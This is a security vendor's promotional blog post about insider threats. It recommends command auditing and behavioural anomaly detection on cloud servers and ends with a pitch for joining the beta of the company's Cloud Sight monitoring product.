Insider Threats: Your Biggest Risk

While many companies have become exceptional at protecting against external threats, is there ever worry for attacks happening internally? Enterprises are focused on stabilizing perimeter defenses against outside hackers, but according to a recent report by Forrester, internal breaches have become the top source of breaches in 2013, with 36% of breaches originating from employees.

Faulty logic: External threats are more pervasive than internal

Insider threats are typically dismissed as a secondary risk to the security of a company — but this is counter intuitive. Enterprises are realizing that they have a lack of system controls and little to no insight on internal network activity. On top of that, given the dynamic capabilities of the cloud, users can quickly and easily spin up new machines on AWS, for example, without explicit consent or security protocols to follow. Consequently, enterprises are becoming more and more aware that internal users who have the right permissions can access sensitive data and cause destruction from within.


Mitigation of these (very real) risks involves actively managing and monitoring user access levels and activity to lessen— and hopefully prevent— any potential damage. Combine the growing complexity of networks with the abundance of new applications and security products, and it’s becoming harder for IT teams to manage their security force — but it doesn’t need to be complicated.

Internal defenses: Detection and auditing

Enterprises must know who is doing what on their cloud servers and when, in order to reduce and stop internal threats. This involves gaining clear visibility into systems and networks to detect and audit user behaviors.

What they need is the ability to audit what a user does once they connect to a network. This includes a full list of commands a user executes when they connect and a profile of normal user behavior to be able to easily detect abnormal activity and stop an attack in an instant. If an employee’s normal behaviors start to change, it’s easy to detect that they could be attempting an attack. Spotting these behaviors consistently and early goes a long way to understanding when an internal threat will occur.

Intrusion detection from within

Enterprises must be strategic at a high level when it comes to security — for both external and internal protection. Ideally, a multi-layered approach should be implemented. Since your users are already inside your network, you need to create deep security layers to prevent them from executing malicious commands when logged in. Always start with the understanding that an attacker is already on the inside, and work backwards from there.

If your organization does not already have these controls in place to restrict privileged access from within, you should be implementing a strong detection and auditing system that logs, monitors, records, and alerts you on all session activities. An effective detection and auditing system will manage, monitor, and secure your cloud infrastructure against internal (and external) attackers. You’ll also benefit from the control and accountability that is critical for meeting compliance regulations and audits.

At Threat Stack, for example, we’ve spared no effort to ensure that our cloud security monitoring solution solves internal vulnerabilities and attacks. Our Cloud Sight product is equally adept at watching for internal anomalies as it is for external activities. Our logs dive deep into every command a user has run to give you a full understanding of what they did before, during, and after a malicious command was executed.

We’ve found that this is far more effective at not only recognizing abnormal activity and stopping it, but helping organizations understand how attacks happen so they can take measures to prevent them from happening in the future.

The scope of security monitoring is changing, especially with the exponential growth of cloud and social applications, and enterprises need to be prepared for an entirely new realm of vulnerabilities and attacks — ones that can easily be identified and stopped with the right continuous security monitoring systems in place.

Interested in how Cloud Sight by Threat Stack can help you monitor internal and external activity at the deepest level?

Join our beta today and begin truly protecting your cloud infrastructure.